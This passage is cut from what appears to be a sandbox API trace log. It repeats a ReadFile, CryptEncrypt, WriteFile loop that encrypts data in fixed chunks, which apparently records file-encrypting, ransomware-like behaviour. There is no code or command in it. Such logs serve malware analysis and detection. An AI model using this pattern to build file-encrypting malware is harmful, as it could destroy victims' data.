pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.368] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.368] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.368] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.368] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.368] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.368] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.368] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.368] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.368] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.368] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.368] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.368] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.368] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.369] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.369] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.369] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.369] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.369] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.369] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.369] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.369] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.369] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.369] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.369] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.369] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.369] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.369] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.370] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.370] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.370] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.370] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.370] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.370] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.370] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.370] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.370] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.370] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.370] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.370] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.370] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.371] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.371] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.371] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.371] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.371] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.371] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.372] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.372] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.372] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.372] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.372] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.372] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.372] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.372] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.372] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.372] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.372] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.372] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.372] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.373] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.373] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.373] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.373] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.373] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.373] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.373] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.373] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.373] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.373] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.373] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.373] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.373] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.373] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.374] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.374] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.374] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.374] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.374] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.374] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.374] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.374] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.374] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.374] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.377] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.377] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.377] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.377] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.378] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.378] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.378] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.378] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.378] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.378] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.378] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.378] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.378] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.378] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.378] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.378] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.379] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, 